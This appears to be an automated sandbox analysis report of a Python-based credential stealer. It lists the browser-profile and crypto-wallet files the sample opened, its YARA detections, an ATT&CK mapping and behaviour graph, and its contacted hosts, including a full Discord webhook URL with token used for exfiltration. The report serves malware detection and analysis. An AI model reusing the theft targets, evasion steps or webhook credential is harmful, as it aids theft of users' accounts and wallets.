            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibagJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnkJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmpJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.filesJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\dbJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\gleanJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\walletsJump to behavior
            Yara detected Generic Python Stealer
            Source: Yara matchFile source: 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rename_me_before.exe PID: 3512, type: MEMORYSTR
            Source: Yara matchFile source: 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1980252152.000001B102F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rename_me_before.exe PID: 3512, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Exela Stealer
            Source: Yara matchFile source: 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rename_me_before.exe PID: 3512, type: MEMORYSTR
            Yara detected Python Stealer
            Source: Yara matchFile source: 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rename_me_before.exe PID: 3512, type: MEMORYSTR
            Yara detected Generic Python Stealer
            Source: Yara matchFile source: 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rename_me_before.exe PID: 3512, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Valid Accounts            		331
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		2
            Disable or Modify Tools            		1
            OS Credential Dumping            		12
            System Time Discovery            		Remote Services1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            Data Encrypted for Impact
            CredentialsDomainsDefault Accounts1
            Native API            		1
            Valid Accounts            		1
            Valid Accounts            		11
            Deobfuscate/Decode Files or Information            		1
            GUI Input Capture            		2
            System Network Connections Discovery            		Remote Desktop Protocol4
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts22
            Command and Scripting Interpreter            		1
            Windows Service            		1
            Windows Service            		21
            Obfuscated Files or Information            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            GUI Input Capture            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Service Execution            		Login Hook11
            Process Injection            		11
            Software Packing            		NTDS56
            System Information Discovery            		Distributed Component Object Model1
            Email Collection            		5
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud Accounts2
            PowerShell            		Network Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets561
            Security Software Discovery            		SSH1
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
            Masquerading            		Cached Domain Credentials2
            Process Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Valid Accounts            		DCSync151
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
            Virtualization/Sandbox Evasion            		Proc Filesystem1
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
            Process Injection            		/etc/passwd and /etc/shadow1
            Remote System Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing31
            System Network Configuration Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582938 Sample: rename_me_before.exe Startdate: 01/01/2025 Architecture: WINDOWS Score: 100 98 store1.gofile.io 2->98 100 ip-api.com 2->100 102 3 other IPs or domains 2->102 112 Antivirus detection for dropped file 2->112 114 Antivirus / Scanner detection for submitted sample 2->114 116 Sigma detected: Capture Wi-Fi password 2->116 118 10 other signatures 2->118 11 rename_me_before.exe 58 2->11         started        15 svchost.exe 2->15         started        signatures3 process4 file5 84 C:\Users\...\_quoting_c.cp311-win_amd64.pyd, PE32+ 11->84 dropped 86 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->86 dropped 88 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 11->88 dropped 90 29 other files (28 malicious) 11->90 dropped 144 Modifies the windows firewall 11->144 146 Tries to harvest and steal WLAN passwords 11->146 148 Gathers network related connection and port information 11->148 17 rename_me_before.exe 140 11->17         started        signatures6 process7 dnsIp8 92 ip-api.com 208.95.112.1, 49739, 80 TUT-ASUS United States 17->92 94 162.159.128.233, 443, 49753 CLOUDFLARENETUS United States 17->94 96 4 other IPs or domains 17->96 72 C:\Users\user\AppData\Local\...xela.exe, PE32+ 17->72 dropped 74 C:\Users\user\AppData\...\VLZDGUKUTZ.jpg, ASCII 17->74 dropped 76 C:\Users\user\AppData\...\VLZDGUKUTZ.docx, ASCII 17->76 dropped 78 8 other malicious files 17->78 dropped 120 Found many strings related to Crypto-Wallets (likely being stolen) 17->120 122 Uses cmd line tools excessively to alter registry or file data 17->122 124 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 17->124 126 6 other signatures 17->126 22 cmd.exe 1 17->22         started        25 cmd.exe 17->25         started        27 cmd.exe 17->27         started        29 12 other processes 17->29 file9 signatures10 process11 signatures12 128 Uses cmd line tools excessively to alter registry or file data 22->128 130 Encrypted powershell cmdline option found 22->130 132 Bypasses PowerShell execution policy 22->132 142 4 other signatures 22->142 31 conhost.exe 22->31         started        134 Overwrites the password of the administrator account 25->134 136 Gathers network related connection and port information 25->136 138 Performs a network lookup / discovery via ARP 25->138 33 systeminfo.exe 25->33         started        36 net.exe 25->36         started        38 net.exe 25->38         started        47 16 other processes 25->47 40 powershell.exe 27->40         started        43 conhost.exe 27->43         started        140 Tries to harvest and steal WLAN passwords 29->140 45 WMIC.exe 1 29->45         started        49 23 other processes 29->49 process13 file14 104 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 33->104 51 WmiPrvSE.exe 33->51         started        106 Overwrites the password of the administrator account 36->106 53 net1.exe 36->53         started        55 net1.exe 38->55         started        80 C:\Users\user\AppData\...\iqddoona.cmdline, Unicode 40->80 dropped 57 csc.exe 40->57         started        108 Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes) 45->108 110 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 45->110 60 quser.exe 47->60         started        62 net1.exe 47->62         started        68 2 other processes 47->68 64 chcp.com 49->64         started        66 chcp.com 49->66         started        signatures15 process16 file17 82 C:\Users\user\AppData\Local\...\iqddoona.dll, PE32 57->82 dropped 70 cvtres.exe 57->70         started        process18

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            rename_me_before.exe68%VirustotalBrowse
            rename_me_before.exe50%ReversingLabsWin64.Adware.RedCap
            rename_me_before.exe100%AviraTR/Redcap.woxyt

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe100%AviraTR/Redcap.woxyt
            C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe58%ReversingLabsWin64.Trojan.Cerbu
            C:\Users\user\AppData\Local\Temp\_MEI13962\VCRUNTIME140.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\_asyncio.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\_bz2.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\_cffi_backend.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\_ctypes.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\_decimal.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\_hashlib.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\_lzma.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\_multiprocessing.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\_overlapped.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\_queue.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\_socket.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\_sqlite3.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\_ssl.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\_uuid.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_helpers.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_http_parser.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_http_writer.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_websocket.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography\hazmat\bindings\_rust.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\frozenlist\_frozenlist.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\libcrypto-3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\libffi-8.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\libssl-3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\multidict\_multidict.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\pyexpat.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\python3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\python311.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\select.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\sqlite3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\unicodedata.pyd4%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI13962\yarl\_quoting_c.cp311-win_amd64.pyd0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://i.hidHdJb0%Avira URL Cloudsafe
            https://www.attrs.org/en/23.2.0/_static/sponsors/FilePreviews.svg0%Avira URL Cloudsafe
            https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=referral&utm_campa0%Avira URL Cloudsafe
            https://www.attrs.org/en/23.2.0/_static/sponsors/Tidelift.svg0%Avira URL Cloudsafe
            https://zopeinterface.readthedocs.io/en/latest/0%Avira URL Cloudsafe
            https://www.attrs.org/en/stable/why.html#data-classes).0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            bg.microsoft.map.fastly.net
            		199.232.210.172
            		truefalse
              		high
              ip-api.com
              		208.95.112.1
              		truefalse
                		high
                canary.discord.com
                		162.159.137.232
                		truefalse
                  		high
                  store1.gofile.io
                  		45.112.123.227
                  		truefalse
                    		high
                    api.gofile.io
                    		45.112.123.126
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://store1.gofile.io/uploadFilefalse
                        		high
                        https://canary.discord.com/api/webhooks/1263157181906419813/b4pV0iwlt5KWRU4QEOMzoONBAdBMW4nt-dNtrU5B2-50jsFyHabL0Uos8mtD0ZVFUQNSfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://www.attrs.org/en/stable/why.html#data-classes).rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://i.hidHdJbrename_me_before.exe, 00000001.00000003.1948127865.000001B1028B9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://docs.python.org/3/library/ssl.html#ssl.OP_NO_COMPRESSIONrename_me_before.exe, 00000001.00000003.1891156202.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1947237648.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1969941981.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971261333.000001B100CC5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1685174704.000001B100CB3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977938973.000001B101240000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C48000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977307117.000001B100CD2000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://account.riotgames.com/api/account/v1/userrename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              https://accounts.reddit.com/api/access_tokenrename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                https://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/?key=440D7F4D810EF9298D25EDDF37C1F9rename_me_before.exe, 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978027683.000001B101370000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  https://github.com/python-attrs/attrs/issues/251rename_me_before.exe, 00000001.00000003.1963524951.000001B100A7B000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1953054230.000001B100A7B000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1967857671.000001B100A7E000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1964107785.000001B100A7B000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971346591.000001B100B51000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1976903040.000001B100B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://tiktok.com/rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      https://github.com/aio-libs/aiohttp/discussions/6044rename_me_before.exe, 00000001.00000003.1891156202.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977125594.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1947237648.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1964107785.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1953054230.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1969941981.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977852804.000001B101140000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971261333.000001B100CC5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1685174704.000001B100CB3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C48000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977307117.000001B100CD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://g.live.com/odclientsettings/ProdV2.C:edb.log.42.dr, qmgr.db.42.drfalse
                                          		high
                                          https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktokrename_me_before.exe, 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://python.orgrename_me_before.exe, 00000001.00000002.1977757597.000001B101040000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              http://python.org:80rename_me_before.exe, 00000001.00000002.1977757597.000001B101040000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#rename_me_before.exe, 00000001.00000003.1965401133.000001B17E4F0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966237596.000001B17E535000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1981201596.000001B17E536000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1667996233.000001B17E531000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1668933285.000001B17E528000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669358961.000001B17E510000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1670306810.000001B17E523000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1668055844.000001B17E535000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669127853.000001B17E528000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965746028.000001B17E529000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://github.com/sponsors/hynekMETADATA.0.drfalse
                                                    		high
                                                    https://github.com/pyca/cryptography/actions?query=workflow%3ACIrename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drfalse
                                                      		high
                                                      https://oauth.reddit.com/api/v1/merename_me_before.exe, 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.apache.org/licenses/LICENSE-2.0rename_me_before.exe, 00000000.00000003.1662615614.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1662503428.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1662689097.000001CF0A2A1000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1662503428.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, LICENSE.APACHE.0.drfalse
                                                          		high
                                                          https://www.attrs.org/en/23.2.0/_static/sponsors/FilePreviews.svgrename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64rename_me_before.exe, 00000001.00000003.1965506103.000001B1005D5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1975466340.000001B1005E9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965777162.000001B1005E8000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965048386.000001B10058E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://g.live.com/odclientsettings/Prod.C:edb.log.42.dr, qmgr.db.42.drfalse
                                                              		high
                                                              https://github.com/python-attrs/attrs/issues/1200)rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661709047.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                		high
                                                                https://raw.githubusercontent.com/python-attrs/attrs/main/docs/_static/attrs_logo.svgrename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                  		high
                                                                  https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization)rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                    		high
                                                                    https://github.com/python-attrs/attrs)rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                      		high
                                                                      https://www.attrs.org/)rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                        		high
